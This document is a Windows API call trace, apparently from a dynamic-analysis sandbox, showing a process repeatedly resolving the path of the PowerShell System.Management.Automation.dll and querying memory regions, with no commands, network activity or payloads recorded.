	[0225.291] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.291] GetLastError () returned 0x0
	[0225.291] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.291] GetLastError () returned 0x0
	[0225.291] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e138, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.291] GetLastError () returned 0x0
	[0225.291] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.291] GetLastError () returned 0x0
	[0225.291] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.291] GetLastError () returned 0x0
	[0225.291] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.291] GetLastError () returned 0x0
	[0225.291] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.291] GetLastError () returned 0x0
	[0225.291] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.291] GetLastError () returned 0x0
	[0225.292] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10df00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.292] GetLastError () returned 0x0
	[0225.292] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10deb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.292] GetLastError () returned 0x0
	[0225.292] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10deb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.292] GetLastError () returned 0x0
	[0225.292] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.292] GetLastError () returned 0x0
	[0225.292] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.292] GetLastError () returned 0x0
	[0225.292] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.292] GetLastError () returned 0x0
	[0225.293] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.293] GetLastError () returned 0x0
	[0225.293] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.293] GetLastError () returned 0x0
	[0225.293] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.293] GetLastError () returned 0x0
	[0225.295] VirtualQuery (in: lpAddress=0x10d374, lpBuffer=0x10e374, dwLength=0x1c | out: lpBuffer=0x10e374*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.296] VirtualQuery (in: lpAddress=0x10d3b0, lpBuffer=0x10e3b0, dwLength=0x1c | out: lpBuffer=0x10e3b0*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.296] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.296] GetLastError () returned 0x0
	[0225.296] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.296] GetLastError () returned 0x0
	[0225.297] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.297] GetLastError () returned 0x0
	[0225.297] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.297] GetLastError () returned 0x0
	[0225.297] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.297] GetLastError () returned 0x0
	[0225.297] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.297] GetLastError () returned 0x0
	[0225.297] VirtualQuery (in: lpAddress=0x10d6e0, lpBuffer=0x10e6e0, dwLength=0x1c | out: lpBuffer=0x10e6e0*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.298] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.298] GetLastError () returned 0x0
	[0225.298] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.298] GetLastError () returned 0x0
	[0225.299] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.299] GetLastError () returned 0x0
	[0225.299] VirtualQuery (in: lpAddress=0x10d6e0, lpBuffer=0x10e6e0, dwLength=0x1c | out: lpBuffer=0x10e6e0*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.299] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.299] GetLastError () returned 0x0
	[0225.299] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.299] GetLastError () returned 0x0
	[0225.300] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.300] GetLastError () returned 0x0
	[0225.300] VirtualQuery (in: lpAddress=0x10d6e0, lpBuffer=0x10e6e0, dwLength=0x1c | out: lpBuffer=0x10e6e0*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.300] VirtualQuery (in: lpAddress=0x10d678, lpBuffer=0x10e678, dwLength=0x1c | out: lpBuffer=0x10e678*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.301] VirtualQuery (in: lpAddress=0x10d6b4, lpBuffer=0x10e6b4, dwLength=0x1c | out: lpBuffer=0x10e6b4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.302] VirtualQuery (in: lpAddress=0x10d678, lpBuffer=0x10e678, dwLength=0x1c | out: lpBuffer=0x10e678*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.302] VirtualQuery (in: lpAddress=0x10d6b4, lpBuffer=0x10e6b4, dwLength=0x1c | out: lpBuffer=0x10e6b4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.302] VirtualQuery (in: lpAddress=0x10d6b4, lpBuffer=0x10e6b4, dwLength=0x1c | out: lpBuffer=0x10e6b4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.303] VirtualQuery (in: lpAddress=0x10d678, lpBuffer=0x10e678, dwLength=0x1c | out: lpBuffer=0x10e678*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.303] VirtualQuery (in: lpAddress=0x10d6b4, lpBuffer=0x10e6b4, dwLength=0x1c | out: lpBuffer=0x10e6b4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.303] VirtualQuery (in: lpAddress=0x10d678, lpBuffer=0x10e678, dwLength=0x1c | out: lpBuffer=0x10e678*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.303] VirtualQuery (in: lpAddress=0x10d6b4, lpBuffer=0x10e6b4, dwLength=0x1c | out: lpBuffer=0x10e6b4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.303] VirtualQuery (in: lpAddress=0x10d678, lpBuffer=0x10e678, dwLength=0x1c | out: lpBuffer=0x10e678*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.305] VirtualQuery (in: lpAddress=0x10d6b4, lpBuffer=0x10e6b4, dwLength=0x1c | out: lpBuffer=0x10e6b4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.305] VirtualQuery (in: lpAddress=0x10d51c, lpBuffer=0x10e51c, dwLength=0x1c | out: lpBuffer=0x10e51c*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.306] VirtualQuery (in: lpAddress=0x10d678, lpBuffer=0x10e678, dwLength=0x1c | out: lpBuffer=0x10e678*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.307] VirtualQuery (in: lpAddress=0x10d6b4, lpBuffer=0x10e6b4, dwLength=0x1c | out: lpBuffer=0x10e6b4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.307] VirtualQuery (in: lpAddress=0x10d678, lpBuffer=0x10e678, dwLength=0x1c | out: lpBuffer=0x10e678*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.307] VirtualQuery (in: lpAddress=0x10d6b4, lpBuffer=0x10e6b4, dwLength=0x1c | out: lpBuffer=0x10e6b4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.307] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0xe874a50a, Data2=0xa1ef, Data3=0x4818, Data4=([0]=0xb8, [1]=0x78, [2]=0xc5, [3]=0x7e, [4]=0x48, [5]=0x47, [6]=0xb, [7]=0x19))) returned 0x0
	[0225.307] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e138, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.307] GetLastError () returned 0x0
	[0225.307] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.307] GetLastError () returned 0x0
	[0225.308] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.308] GetLastError () returned 0x0
	[0225.308] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e138, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.308] GetLastError () returned 0x0
	[0225.308] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.308] GetLastError () returned 0x0
	[0225.308] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.308] GetLastError () returned 0x0
	[0225.308] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.308] GetLastError () returned 0x0
	[0225.308] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.308] GetLastError () returned 0x0
	[0225.308] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.309] GetLastError () returned 0x0
	[0225.309] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10df00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.309] GetLastError () returned 0x0
	[0225.309] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10deb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.309] GetLastError () returned 0x0
	[0225.309] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10deb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.309] GetLastError () returned 0x0
	[0225.309] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.309] GetLastError () returned 0x0
	[0225.309] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.309] GetLastError () returned 0x0
	[0225.309] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.309] GetLastError () returned 0x0
	[0225.309] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.309] GetLastError () returned 0x0
	[0225.309] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.309] GetLastError () returned 0x0
	[0225.310] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.310] GetLastError () returned 0x0
	[0225.310] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.310] GetLastError () returned 0x0
